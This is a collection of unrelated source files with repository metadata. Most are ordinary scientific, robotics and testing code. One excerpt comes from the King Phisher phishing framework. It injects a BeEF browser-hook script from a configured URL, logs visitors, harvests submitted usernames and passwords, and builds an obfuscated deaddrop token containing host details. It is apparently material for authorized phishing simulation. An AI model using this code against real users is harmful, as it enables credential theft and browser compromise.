session = db_manager.Session()
query = session.query(db_models.Message)
query = query.filter_by(id=msg_id, opened=None)
message = query.first()
if message:
message.opened = db_models.current_timestamp()
session.commit()
session.close()
def handle_javascript_hook(self, query):
kp_hook_js = find.find_data_file('javascript_hook.js')
if not kp_hook_js:
self.respond_not_found()
return
with open(kp_hook_js, 'r') as kp_hook_js:
javascript = kp_hook_js.read()
if self.config.has_option('beef.hook_url'):
javascript += "\nloadScript('{0}');\n\n".format(self.config.get('beef.hook_url'))
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache')
self.send_header('Expires', '0')
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'POST, GET')
self.send_header('Content-Length', str(len(javascript)))
self.end_headers()
if not isinstance(javascript, bytes):
javascript = javascript.encode('utf-8')
self.wfile.write(javascript)
return
def handle_page_visit(self):
if not self.message_id:
return
if self.message_id == self.config.get('server.secret_id'):
return
if not self.campaign_id:
return
client_ip = self.get_client_ip()
self.logger.info("handling a page visit for campaign id: {0} from IP address: {1}".format(self.campaign_id, client_ip))
session = db_manager.Session()
campaign = db_manager.get_row_by_id(session, db_models.Campaign, self.campaign_id)
message = db_manager.get_row_by_id(session, db_models.Message, self.message_id)
if message.opened == None and self.config.get_if_exists('server.set_message_opened_on_visit', True):
message.opened = db_models.current_timestamp()
set_new_visit = True
visit_id = make_uid()
if self.visit_id:
set_new_visit = False
visit_id = self.visit_id
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=self.campaign_id, hostname=self.vhost, page=self.request_path[1:])
if query.count():
visit = db_manager.get_row_by_id(session, db_models.Visit, visit_id)
if visit.message_id == self.message_id:
visit.visit_count += 1
else:
set_new_visit = True
if set_new_visit:
kp_cookie_name = self.config.get('server.cookie_name')
cookie = "{0}={1}; Path=/; HttpOnly".format(kp_cookie_name, visit_id)
self.send_header('Set-Cookie', cookie)
visit = db_models.Visit(id=visit_id, campaign_id=self.campaign_id, message_id=self.message_id)
visit.visitor_ip = client_ip
visit.visitor_details = self.headers.get('user-agent', '')
session.add(visit)
visit_count = len(campaign.visits)
if visit_count > 0 and ((visit_count in [1, 10, 25]) or ((visit_count % 50) == 0)):
alert_text = "{0} visits reached for campaign: {{campaign_name}}".format(visit_count)
self.server.job_manager.job_run(self.issue_alert, (alert_text, self.campaign_id))
self._handle_page_visit_creds(session, visit_id)
trained = self.get_query('trained')
if isinstance(trained, str) and trained.lower() in ['1', 'true', 'yes']:
message.trained = True
session.commit()
session.close()
def _handle_page_visit_creds(self, session, visit_id):
username = None
for pname in ['username', 'user', 'u']:
username = (self.get_query(pname) or self.get_query(pname.title()) or self.get_query(pname.upper()))
if username:
break
if not username:
return
password = None
for pname in ['password', 'pass', 'p']:
password = (self.get_query(pname) or self.get_query(pname.title()) or self.get_query(pname.upper()))
if password:
break
password = (password or '')
cred_count = 0
query = session.query(db_models.Credential)
query = query.filter_by(message_id=self.message_id, username=username, password=password)
if query.count() == 0:
cred = db_models.Credential(campaign_id=self.campaign_id, message_id=self.message_id, visit_id=visit_id)
cred.username = username
cred.password = password
session.add(cred)
campaign = db_manager.get_row_by_id(session, db_models.Campaign, self.campaign_id)
cred_count = len(campaign.credentials)
if cred_count > 0 and ((cred_count in [1, 5, 10]) or ((cred_count % 25) == 0)):
alert_text = "{0} credentials submitted for campaign: {{campaign_name}}".format(cred_count)
self.server.job_manager.job_run(self.issue_alert, (alert_text, self.campaign_id))
class KingPhisherServer(AdvancedHTTPServer):
"""
The main HTTP and RPC server for King Phisher.
"""
def __init__(self, config, HandlerClass, *args, **kwargs):
"""
:param config: Configuration to retrieve settings from.
:type config: :py:class:`smoke_zephyr.configuration.Configuration`
"""
# additional mime types to be treated as html because they're probably cloned pages
HandlerClass.extensions_map.update({
'': 'text/html',
'.asp': 'text/html',
'.aspx': 'text/html',
'.cfm': 'text/html',
'.cgi': 'text/html',
'.do': 'text/html',
'.jsp': 'text/html',
'.nsf': 'text/html',
'.php': 'text/html',
'.srf': 'text/html'
})
super(KingPhisherServer, self).__init__(HandlerClass, *args, **kwargs)
self.logger = logging.getLogger('KingPhisher.Server')
self.config = config
"""A :py:class:`~smoke_zephyr.configuration.Configuration` instance used as the main King Phisher server configuration."""
self.serve_files = True
self.serve_files_root = config.get('server.web_root')
self.serve_files_list_directories = False
self.serve_robots_txt = True
self.database_engine = db_manager.init_database(config.get('server.database'))
self.http_server.config = config
self.http_server.throttle_semaphore = threading.Semaphore()
self.http_server.forked_authenticator = authenticator.ForkedAuthenticator(required_group=config.get_if_exists('server.authentication.group'))
self.logger.debug('forked an authenticating process with PID: ' + str(self.http_server.forked_authenticator.child_pid))
self.job_manager = job.JobManager()
"""A :py:class:`~smoke_zephyr.job.JobManager` instance for scheduling tasks."""
self.job_manager.start()
self.http_server.job_manager = self.job_manager
loader = jinja2.FileSystemLoader(config.get('server.web_root'))
global_vars = {}
if config.has_section('server.page_variables'):
global_vars = config.get('server.page_variables')
global_vars['embed_youtube_video'] = pages.embed_youtube_video
global_vars['make_csrf_page'] = pages.make_csrf_page
global_vars['make_redirect_page'] = pages.make_redirect_page
self.http_server.template_env = templates.BaseTemplateEnvironment(loader=loader, global_vars=global_vars)
self.__geoip_db = geoip.init_database(config.get('server.geoip.database'))
self.__is_shutdown = threading.Event()
self.__is_shutdown.clear()
def shutdown(self, *args, **kwargs):
"""
Request that the server perform any cleanup necessary and then
shut down. This will wait for the server to stop before it
returns.
"""
if self.__is_shutdown.is_set():
return
self.logger.warning('processing shutdown request')
super(KingPhisherServer, self).shutdown(*args, **kwargs)
self.http_server.forked_authenticator.stop()
self.logger.debug('stopped the forked authenticator process')
self.job_manager.stop()
self.__geoip_db.close()
self.__is_shutdown.set()
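# --- Illustrative sketch, not part of the original module ----------------------
# handle_deaddrop_visit() above expects a 'token' query parameter built as
# JSON -> XOR obfuscation -> base64. The helper below mirrors that pipeline on
# the client side purely for illustration: the field values are hypothetical and
# the single-byte XOR is only a stand-in for the real king_phisher.xor helpers.
def _demo_build_deaddrop_token(deaddrop_id, key=0x42):
	payload = json.dumps({
		'deaddrop_id': deaddrop_id,
		'local_username': 'demo-user',
		'local_hostname': 'demo-host',
		'local_ip_addresses': ['192.0.2.10']
	}).encode('utf-8')
	# stand-in for xor.xor_encode(); the server reverses its step with xor.xor_decode()
	obfuscated = bytes(b ^ key for b in payload)
	return base64.b64encode(obfuscated)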
|
drptbl/king-phisher
|
king_phisher/server/server.py
|
Python
|
bsd-3-clause
| 27,595
|
[
"VisIt"
] |
4f1a55ec95719b0027f4b0484bcf2932961304c36f8f768059a8036c0daf02f0
|
"""
Use this script for setting the arguments.
(c) May 2017 by Daniel Seita
"""
import argparse
import logz
import os
import pickle
import tensorflow as tf
import utils
from es import ESAgent
if __name__ == "__main__":
""" LOTS of arguments here, but hopefully most are straightforward. Run
`python main.py -h` to visualize the help messages.
"""
parser = argparse.ArgumentParser()
parser.add_argument('envname', type=str,
help='The OpenAI gym environment name (case sensitive).')
parser.add_argument('--do_not_save', action='store_true',
help='Sets the log_dir to be None.')
parser.add_argument('--es_iters', type=int, default=100,
help='Iterations to run ES.')
parser.add_argument('--log_every_t_iter', type=int, default=1,
help='Controls the amount of time information is logged.')
parser.add_argument('--lrate_es', type=float, default=0.001,
help='Learning rate for the ES gradient update.')
parser.add_argument('--npop', type=int, default=200,
        help='Weight vectors to sample for ES (INCLUDING the mirroring).')
parser.add_argument('--render', action='store_true',
help='Use `--render` to visualize trajectories each iteration.')
parser.add_argument('--seed', type=int, default=0,
help='The random seed.')
parser.add_argument('--sigma', type=float, default=0.1,
help='Sigma (standard deviation) for the Gaussian noise.')
parser.add_argument('--snapshot_every_t_iter', type=int, default=100,
help='Save the model every t iterations so we can inspect later.')
parser.add_argument('--test_trajs', type=int, default=10,
help='Number of evaluation trajectories after each iteration.')
parser.add_argument('--verbose', action='store_true',
help='Use `--verbose` for a few additional debugging messages.')
args = parser.parse_args()
assert args.npop % 2 == 0 # Just to be consistent with my other code.
# Make the TensorFlow session and do some logic with handling arguments.
session = utils.get_tf_session()
log_dir = None
if not args.do_not_save:
log_dir = 'outputs/' +args.envname+ '/seed' +str(args.seed).zfill(4)
logz.configure_output_dir(log_dir)
os.makedirs(log_dir+'/snapshots/')
with open(log_dir+'/args.pkl','wb') as f:
pickle.dump(args, f)
# Build and run evolution strategies.
es_agent = ESAgent(session, args, log_dir)
es_agent.run_es()
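# --- Illustrative usage, not part of the original script -----------------------
# Hypothetical invocations (environment name and hyperparameters are examples
# only; --npop must be even):
#
#   python main.py InvertedPendulum-v1 --es_iters 200 --npop 100 --sigma 0.1 --seed 3
#   python main.py InvertedPendulum-v1 --do_not_save --render --verbose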
|
DanielTakeshi/rl_algorithms
|
es/main.py
|
Python
|
mit
| 2,542
|
[
"Gaussian"
] |
8d3a32b9f7d777401f16c4b9effb8483a929f38c359298d1296fc0a3866ea40a
|
#
# Copyright (C) 2008, Brian Tanner
#
#http://rl-glue-ext.googlecode.com/
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Revision: 617 $
# $Date: 2009-02-05 04:24:12 -0500 (Thu, 05 Feb 2009) $
# $Author: gabalz $
# $HeadURL: http://rl-glue-ext.googlecode.com/svn/trunk/projects/codecs/Python/src/tests/test_empty_experiment.py $
import sys
import rlglue.RLGlue as RLGlue
from glue_test import glue_test
tester =glue_test("test_empty")
task_spec=RLGlue.RL_init()
for whichEpisode in range(1, 5):
startTuple=RLGlue.RL_start()
if(whichEpisode%2==0):
tester.check_fail(len(startTuple.a.intArray)!=0)
tester.check_fail(len(startTuple.a.doubleArray)!=0)
tester.check_fail(len(startTuple.a.charArray)!=0)
tester.check_fail(len(startTuple.o.intArray)!=0)
tester.check_fail(len(startTuple.o.doubleArray)!=0)
tester.check_fail(len(startTuple.o.charArray)!=0)
else:
tester.check_fail(len(startTuple.a.intArray)!=7)
tester.check_fail(len(startTuple.a.doubleArray)!=3)
tester.check_fail(len(startTuple.a.charArray)!=1)
tester.check_fail(len(startTuple.o.intArray)!=2)
tester.check_fail(len(startTuple.o.doubleArray)!=4)
tester.check_fail(len(startTuple.o.charArray)!=5)
for whichStep in range(0,5):
stepTuple=RLGlue.RL_step()
tester.check_fail(stepTuple.terminal!=0)
tester.check_fail(stepTuple.r!=0)
if(whichEpisode%2==0):
tester.check_fail(len(stepTuple.a.intArray)!=0)
tester.check_fail(len(stepTuple.a.doubleArray)!=0)
tester.check_fail(len(stepTuple.a.charArray)!=0)
tester.check_fail(len(stepTuple.o.intArray)!=0)
tester.check_fail(len(stepTuple.o.doubleArray)!=0)
tester.check_fail(len(stepTuple.o.charArray)!=0)
else:
tester.check_fail(len(stepTuple.a.intArray)!=7)
tester.check_fail(len(stepTuple.a.doubleArray)!=3)
tester.check_fail(len(stepTuple.a.charArray)!=1)
tester.check_fail(len(stepTuple.o.intArray)!=2)
tester.check_fail(len(stepTuple.o.doubleArray)!=4)
tester.check_fail(len(stepTuple.o.charArray)!=5)
print tester.get_summary()
sys.exit(tester.getFailCount())
|
shiwalimohan/RLInfiniteMario
|
system/codecs/Python/src/tests/test_empty_experiment.py
|
Python
|
gpl-2.0
| 2,574
|
[
"Brian"
] |
65f0c4c84efc4d3b5140500129fbfca4a01c1c7032f57bb0e7f093917c33f111
|
# !/bin/python
# -*- coding: latin-1 -*-
# Copyright (C) 2009-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
# Hexa: creation of hexahedra
import hexablock
import os
#---+----1----+----2----+----3----+----4----+----5----+----6----+----7----+----8
doc = hexablock.addDocument ("default")
vx = doc.addVector (1,0,0)
vy = doc.addVector (0,1,0)
vz = doc.addVector (0,0,1)
vxy = doc.addVector (1,1,0)
nbr_files = 0
# ======================================================= save_vtk
def save_vtk () :
global nbr_files
nom = "monica%d.vtk" % nbr_files
nbr_files += 1
doc.saveVtk (nom)
# ======================================================= carre
def carre (x) :
return x*x
# ======================================================= get_center
def get_center (quad) :
px = 0
py = 0
pz = 0
for nv in range (4) :
vertex = quad.getVertex (nv)
px += vertex.getX() / 4
py += vertex.getY() / 4
pz += vertex.getZ() / 4
return [ px, py, pz ]
# ======================================================= nearest
def nearest (grid, vertex) :
nbre = grid.countVertex()
dmin = 1e+6
result = None
px = vertex.getX()
py = vertex.getY()
pz = vertex.getZ()
for nro in range (nbre) :
v1 = grid.getVertex (nro)
d2 = carre(px-v1.getX()) + carre(py-v1.getY()) + carre(pz-v1.getZ())
if (d2 < dmin) :
result = v1
dmin = d2
print vertex.getName () , px, py, pz, " -> ", result.getName()
return result
# ======================================================= nearest_quad
def nearest_quad (grid, quad) :
dmin = 1e+16
result = None
[ox, oy, oz] = get_center (quad)
nbre = grid.countQuad ()
for nro in range (nbre) :
q1 = grid.getQuad (nro)
if q1 != None :
[px, py, pz] = get_center (q1)
d2 = carre(px-ox) + carre(py-oy) + carre(pz-oz)
if (d2 < dmin) :
result = q1
dmin = d2
print quad.getName () , px, py, pz, " -> ", result.getName()
return result
# ======================================================= insert_cylinder
def insert_cylinder (plaque, nx, ny) :
hexa = plaque.getHexaIJK (nx, ny, 0)
xmin = 666 ; ymin = xmin ; zmin = xmin
xmax = -666 ; ymax = xmax ; zmax = xmax
tabv1 = []
for nv in range (8) :
node = hexa.getVertex (nv)
xmin = min (xmin, node.getX()) ; xmax = max (xmax, node.getX())
ymin = min (ymin, node.getY()) ; ymax = max (ymax, node.getY())
zmin = min (zmin, node.getZ()) ; zmax = max (zmax, node.getZ())
tabv1.append (node)
doc.removeHexa (hexa)
save_vtk ()
dx = (xmax - xmin)/2
dz = (zmax - zmin)/2
xorig = (xmin + xmax)/2
yorig = (ymin + ymax)/2
zorig = (zmin + zmax)/2 - 3*dz
orig = doc.addVertex (xorig, yorig, zorig)
nr = 1
na = 4
nh = 3
rext = dx
rint = rext/3
haut = 3
angle = 360
pipe = doc.makePipeUni (orig, vxy,vz, rint,rext,angle,haut, nr,na,nh)
hexablock.what ()
tabquad = []
tabv0 = []
for nq in range (4) :
quad = pipe.getQuadJK (1, nq, 1)
tabquad.append (quad)
print " .. tabquad[0] = ", tabquad[0].getName ()
cible = nearest_quad (plaque, tabquad[0])
tabquad[0]. setColor (5)
cible . setColor (5)
save_vtk ()
va1 = tabquad[0].getVertex (0)
va2 = tabquad[0].getVertex (1)
vb1 = cible.nearestVertex (va1)
vb2 = cible.nearestVertex (va2)
doc.setLevel (1)
doc.joinQuadsUni (tabquad, cible, va1, vb1, va2, vb2, 1)
hexablock.what ()
save_vtk ()
return
doc.setLevel (1)
for nv in range (8) :
ier = doc.mergeVertices (tabv0[nv], tabv1[nv])
print "ier = ", ier
save_vtk ()
# ======================================================= test_monica
def test_monica () :
orig = doc.addVertex (0,0,0)
lx = 1
ly = lx
lz = lx
nx = 3
ny = nx
nz = 1
plaque = doc.makeCartesianUni (orig, vx,vy,vz, lx, ly, lz, nx,ny,nz)
save_vtk ()
insert_cylinder (plaque, 1, 1)
## hexa = plaque.getHexaIJK (1,1,0)
## doc.removeHexa (hexa)
return doc
# ================================================================= Begin
doc = test_monica ()
law = doc.addLaw("Uniform", 4)
for j in range(doc.countPropagation()):
propa = doc.getPropagation(j)
propa.setLaw(law)
mesh_hexas = hexablock.mesh (doc)
|
FedoraScientific/salome-hexablock
|
src/TEST_PY/test_v6/monica.py
|
Python
|
lgpl-2.1
| 5,353
|
[
"VTK"
] |
f1b048d6f8f6a90ee8b123115e8a85d39a2d190cfde9685c1c91372d1537a0bd
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module implements equivalents of the basic ComputedEntry objects, which
is the basic entity that can be used to perform many analyses. ComputedEntries
contain calculated information, typically from VASP or other electronic
structure codes. For example, ComputedEntries can be used as inputs for phase
diagram analysis.
"""
import json
from monty.json import MontyEncoder, MontyDecoder
from pymatgen.core.composition import Composition
from pymatgen.core.structure import Structure
from pymatgen.entries import Entry
__author__ = "Shyue Ping Ong, Anubhav Jain"
__copyright__ = "Copyright 2011, The Materials Project"
__version__ = "1.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__status__ = "Production"
__date__ = "Apr 30, 2012"
class ComputedEntry(Entry):
"""
Lightweight Entry object for computed data. Contains facilities
for applying corrections to the .energy attribute and for storing
calculation parameters.
"""
def __init__(self,
composition: Composition,
energy: float,
correction: float = 0.0,
parameters: dict = None,
data: dict = None,
entry_id: object = None):
"""
Initializes a ComputedEntry.
Args:
composition (Composition): Composition of the entry. For
flexibility, this can take the form of all the typical input
taken by a Composition, including a {symbol: amt} dict,
a string formula, and others.
energy (float): Energy of the entry. Usually the final calculated
energy from VASP or other electronic structure codes.
correction (float): A correction to be applied to the energy.
This is used to modify the energy for certain analyses.
Defaults to 0.0.
parameters (dict): An optional dict of parameters associated with
the entry. Defaults to None.
data (dict): An optional dict of any additional data associated
with the entry. Defaults to None.
entry_id (obj): An optional id to uniquely identify the entry.
"""
super().__init__(composition, energy)
self.uncorrected_energy = self._energy
self.correction = correction
self.parameters = parameters if parameters else {}
self.data = data if data else {}
self.entry_id = entry_id
self.name = self.composition.reduced_formula
@property
def energy(self) -> float:
"""
:return: the *corrected* energy of the entry.
"""
return self._energy + self.correction
def normalize(self, mode: str = "formula_unit") -> None:
"""
Normalize the entry's composition and energy.
Args:
mode: "formula_unit" is the default, which normalizes to
composition.reduced_formula. The other option is "atom", which
normalizes such that the composition amounts sum to 1.
"""
factor = self._normalization_factor(mode)
self.correction /= factor
self.uncorrected_energy /= factor
super().normalize(mode)
def __repr__(self):
output = ["ComputedEntry {} - {}".format(self.entry_id,
self.composition.formula),
"Energy = {:.4f}".format(self._energy),
"Correction = {:.4f}".format(self.correction),
"Parameters:"]
for k, v in self.parameters.items():
output.append("{} = {}".format(k, v))
output.append("Data:")
for k, v in self.data.items():
output.append("{} = {}".format(k, v))
return "\n".join(output)
@classmethod
def from_dict(cls, d) -> 'ComputedEntry':
"""
:param d: Dict representation.
:return: ComputedEntry
"""
dec = MontyDecoder()
return cls(d["composition"], d["energy"], d["correction"],
parameters={k: dec.process_decoded(v)
for k, v in d.get("parameters", {}).items()},
data={k: dec.process_decoded(v)
for k, v in d.get("data", {}).items()},
entry_id=d.get("entry_id", None))
def as_dict(self) -> dict:
"""
:return: MSONable dict.
"""
return_dict = super().as_dict()
return_dict.update({"parameters": json.loads(json.dumps(self.parameters, cls=MontyEncoder)),
"data": json.loads(json.dumps(self.data, cls=MontyEncoder)),
"entry_id": self.entry_id,
"correction": self.correction})
return return_dict
class ComputedStructureEntry(ComputedEntry):
"""
A heavier version of ComputedEntry which contains a structure as well. The
structure is needed for some analyses.
"""
def __init__(self,
structure: Structure,
energy: float,
correction: float = 0.0,
parameters: dict = None,
data: dict = None,
entry_id: object = None):
"""
Initializes a ComputedStructureEntry.
Args:
structure (Structure): The actual structure of an entry.
energy (float): Energy of the entry. Usually the final calculated
energy from VASP or other electronic structure codes.
correction (float): A correction to be applied to the energy.
This is used to modify the energy for certain analyses.
Defaults to 0.0.
parameters (dict): An optional dict of parameters associated with
the entry. Defaults to None.
data (dict): An optional dict of any additional data associated
with the entry. Defaults to None.
entry_id (obj): An optional id to uniquely identify the entry.
"""
super().__init__(
structure.composition, energy, correction=correction,
parameters=parameters, data=data, entry_id=entry_id)
self.structure = structure
def __repr__(self):
output = ["ComputedStructureEntry {} - {}".format(
self.entry_id, self.composition.formula),
"Energy = {:.4f}".format(self.uncorrected_energy),
"Correction = {:.4f}".format(self.correction), "Parameters:"]
for k, v in self.parameters.items():
output.append("{} = {}".format(k, v))
output.append("Data:")
for k, v in self.data.items():
output.append("{} = {}".format(k, v))
return "\n".join(output)
def __str__(self):
return self.__repr__()
def as_dict(self) -> dict:
"""
        :return: MSONable dict.
"""
d = super().as_dict()
d["@module"] = self.__class__.__module__
d["@class"] = self.__class__.__name__
d["structure"] = self.structure.as_dict()
return d
@classmethod
def from_dict(cls, d) -> 'ComputedStructureEntry':
"""
:param d: Dict representation.
:return: ComputedStructureEntry
"""
dec = MontyDecoder()
return cls(dec.process_decoded(d["structure"]),
d["energy"], d["correction"],
parameters={k: dec.process_decoded(v)
for k, v in d.get("parameters", {}).items()},
data={k: dec.process_decoded(v)
for k, v in d.get("data", {}).items()},
entry_id=d.get("entry_id", None))
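# --- Illustrative sketch, not part of pymatgen ----------------------------------
# Minimal use of ComputedEntry: the formula, energies and id below are
# hypothetical values chosen only to show how the correction is applied.
def _demo_computed_entry():
    entry = ComputedEntry("Fe2O3", energy=-67.5, correction=-2.0, entry_id="demo-1")
    assert entry.uncorrected_energy == -67.5
    assert entry.energy == -69.5  # corrected energy = raw energy + correction
    return entry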
|
gVallverdu/pymatgen
|
pymatgen/entries/computed_entries.py
|
Python
|
mit
| 7,871
|
[
"VASP",
"pymatgen"
] |
ab21271fc18637a6132c6ff836be4bb4b4d45bcc9c43ec1a86ff4e8cd026955a
|
import argparse
from director import consoleapp
from director import cameraview
from director import applogic
from director import viewbehaviors
from director import objectmodel as om
from director import vtkAll as vtk
import PythonQt
from PythonQt import QtGui
import bot_core as lcmbotcore
class ImageViewApp(object):
def __init__(self):
self.setup()
def addShortcuts(self, widget):
applogic.addShortcut(widget, 'Ctrl+Q', consoleapp.ConsoleApp.quit)
applogic.addShortcut(widget, 'F8', consoleapp.ConsoleApp.showPythonConsole)
def parseArgs(self, defaultChannel='MULTISENSE_CAMERA_LEFT'):
parser = argparse.ArgumentParser()
parser.add_argument('--channel', type=str, help='image channel', default=defaultChannel)
parser.add_argument('--pointcloud', action='store_true', help='display pointcloud view for RGB-D messages')
parser.add_argument('--disparity', action='store_true', help='receive disparity images for --rgbd flag')
imageType = parser.add_mutually_exclusive_group(required=False)
imageType.add_argument('--rgb', action='store_const', const='rgb', help='receive RGB image messages', dest='imageType')
imageType.add_argument('--rgbd', action='store_const', const='rgbd', help='receive RGB-D images messages', dest='imageType')
imageType.set_defaults(imageType='rgb')
args, unknown = parser.parse_known_args()
return args
def setup(self):
args = self.parseArgs()
imageManager = cameraview.ImageManager()
self.imageManager = imageManager
channel = args.channel
imageType = args.imageType
self.app = consoleapp.ConsoleApp()
self.views = []
if imageType == 'rgb':
imageName = channel
imageManager.queue.addCameraStream(channel, imageName, -1)
imageManager.addImage(imageName)
cameraView = cameraview.CameraImageView(imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView())
cameraView.eventFilterEnabled = False
cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(vtk.vtkInteractorStyleImage())
cameraView.view.resize(640, 480)
self.views.append(cameraView.view)
self.cameraView = cameraView
elif imageType == 'rgbd':
imageName = channel + '_LEFT'
imageManager.queue.addCameraStream(channel, imageName, 0)
imageManager.addImage(imageName)
cameraView = cameraview.CameraImageView(imageManager, imageName, view=PythonQt.dd.ddQVTKWidgetView())
cameraView.eventFilterEnabled = False
cameraView.view.renderWindow().GetInteractor().SetInteractorStyle(vtk.vtkInteractorStyleImage())
self.views.append(cameraView.view)
imageName2 = channel + '_D'
if args.disparity:
imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DISPARITY_ZIPPED)
else:
imageManager.queue.addCameraStream(channel, imageName2, lcmbotcore.images_t.DEPTH_MM_ZIPPED)
imageManager.addImage(imageName2)
cameraView2 = cameraview.CameraImageView(imageManager, imageName2, view=PythonQt.dd.ddQVTKWidgetView())
cameraView2.eventFilterEnabled = False
cameraView2.useImageColorMap = True
cameraView2.view.renderWindow().GetInteractor().SetInteractorStyle(vtk.vtkInteractorStyleImage())
self.views.append(cameraView2.view)
if args.pointcloud:
from director import segmentation
cameraview.imageManager = imageManager
pointCloudObj = segmentation.DisparityPointCloudItem('Point cloud', channel, imageName, imageManager)
view = PythonQt.dd.ddQVTKWidgetView()
pointCloudObj.addToView(view)
om.addToObjectModel(pointCloudObj)
pointCloudObj.setProperty('Visible', True)
pointCloudObj.setProperty('Target FPS', 30)
pointCloudObj.setProperty('Max Range', 30)
pointCloudObj.setProperty('Remove Size', 0)
viewBehaviors = viewbehaviors.ViewBehaviors(view)
view.camera().SetPosition([0, 0, 0])
view.camera().SetFocalPoint([0,0,1])
view.camera().SetViewUp([0,-1,0])
view.camera().SetViewAngle(45)
self.views.append(view)
self.cameraView = cameraView
self.cameraView2 = cameraView2
w = QtGui.QWidget()
l = QtGui.QHBoxLayout(w)
for view in self.views:
l.addWidget(view)
l.setContentsMargins(0, 0, 0, 0)
w.resize(640*len(self.views), 480)
w.show()
self.addShortcuts(w)
self.widget = w
def start(self):
self.app.start()
def main():
ImageViewApp().start()
if __name__ == '__main__':
main()
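# --- Illustrative usage, not part of the original script -----------------------
# Hypothetical invocations; the channel names depend on the robot's LCM setup:
#
#   python imageviewapp.py --channel MULTISENSE_CAMERA_LEFT
#   python imageviewapp.py --channel MULTISENSE_CAMERA --rgbd --disparity --pointcloud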
|
patmarion/director
|
src/python/director/imageviewapp.py
|
Python
|
bsd-3-clause
| 5,008
|
[
"VTK"
] |
5ee7ea5466ac95754758477e19a5f6b441970c5b7267e06585a4aff6b1a0e734
|
"""Rewrite assertion AST to produce nice error messages"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ast
import errno
import imp
import itertools
import marshal
import os
import re
import string
import struct
import sys
import types
import atomicwrites
import py
import six
from _pytest._io.saferepr import saferepr
from _pytest.assertion import util
from _pytest.assertion.util import ( # noqa: F401
format_explanation as _format_explanation,
)
from _pytest.compat import spec_from_file_location
from _pytest.pathlib import fnmatch_ex
from _pytest.pathlib import PurePath
# pytest caches rewritten pycs in __pycache__.
if hasattr(imp, "get_tag"):
PYTEST_TAG = imp.get_tag() + "-PYTEST"
else:
if hasattr(sys, "pypy_version_info"):
impl = "pypy"
elif sys.platform == "java":
impl = "jython"
else:
impl = "cpython"
ver = sys.version_info
PYTEST_TAG = "%s-%s%s-PYTEST" % (impl, ver[0], ver[1])
del ver, impl
PYC_EXT = ".py" + (__debug__ and "c" or "o")
PYC_TAIL = "." + PYTEST_TAG + PYC_EXT
ASCII_IS_DEFAULT_ENCODING = sys.version_info[0] < 3
if sys.version_info >= (3, 5):
ast_Call = ast.Call
else:
def ast_Call(a, b, c):
return ast.Call(a, b, c, None, None)
class AssertionRewritingHook(object):
"""PEP302 Import hook which rewrites asserts."""
def __init__(self, config):
self.config = config
self.fnpats = config.getini("python_files")
self.session = None
self.modules = {}
self._rewritten_names = set()
self._register_with_pkg_resources()
self._must_rewrite = set()
# flag to guard against trying to rewrite a pyc file while we are already writing another pyc file,
# which might result in infinite recursion (#3506)
self._writing_pyc = False
self._basenames_to_check_rewrite = {"conftest"}
self._marked_for_rewrite_cache = {}
self._session_paths_checked = False
def set_session(self, session):
self.session = session
self._session_paths_checked = False
def _imp_find_module(self, name, path=None):
"""Indirection so we can mock calls to find_module originated from the hook during testing"""
return imp.find_module(name, path)
def find_module(self, name, path=None):
if self._writing_pyc:
return None
state = self.config._assertstate
if self._early_rewrite_bailout(name, state):
return None
state.trace("find_module called for: %s" % name)
names = name.rsplit(".", 1)
lastname = names[-1]
pth = None
if path is not None:
# Starting with Python 3.3, path is a _NamespacePath(), which
# causes problems if not converted to list.
path = list(path)
if len(path) == 1:
pth = path[0]
if pth is None:
try:
fd, fn, desc = self._imp_find_module(lastname, path)
except ImportError:
return None
if fd is not None:
fd.close()
tp = desc[2]
if tp == imp.PY_COMPILED:
if hasattr(imp, "source_from_cache"):
try:
fn = imp.source_from_cache(fn)
except ValueError:
# Python 3 doesn't like orphaned but still-importable
# .pyc files.
fn = fn[:-1]
else:
fn = fn[:-1]
elif tp != imp.PY_SOURCE:
# Don't know what this is.
return None
else:
fn = os.path.join(pth, name.rpartition(".")[2] + ".py")
fn_pypath = py.path.local(fn)
if not self._should_rewrite(name, fn_pypath, state):
return None
self._rewritten_names.add(name)
# The requested module looks like a test file, so rewrite it. This is
# the most magical part of the process: load the source, rewrite the
# asserts, and load the rewritten source. We also cache the rewritten
# module code in a special pyc. We must be aware of the possibility of
# concurrent pytest processes rewriting and loading pycs. To avoid
# tricky race conditions, we maintain the following invariant: The
# cached pyc is always a complete, valid pyc. Operations on it must be
# atomic. POSIX's atomic rename comes in handy.
write = not sys.dont_write_bytecode
cache_dir = os.path.join(fn_pypath.dirname, "__pycache__")
if write:
try:
os.mkdir(cache_dir)
except OSError:
e = sys.exc_info()[1].errno
if e == errno.EEXIST:
# Either the __pycache__ directory already exists (the
# common case) or it's blocked by a non-dir node. In the
# latter case, we'll ignore it in _write_pyc.
pass
elif e in [errno.ENOENT, errno.ENOTDIR]:
# One of the path components was not a directory, likely
# because we're in a zip file.
write = False
elif e in [errno.EACCES, errno.EROFS, errno.EPERM]:
state.trace("read only directory: %r" % fn_pypath.dirname)
write = False
else:
raise
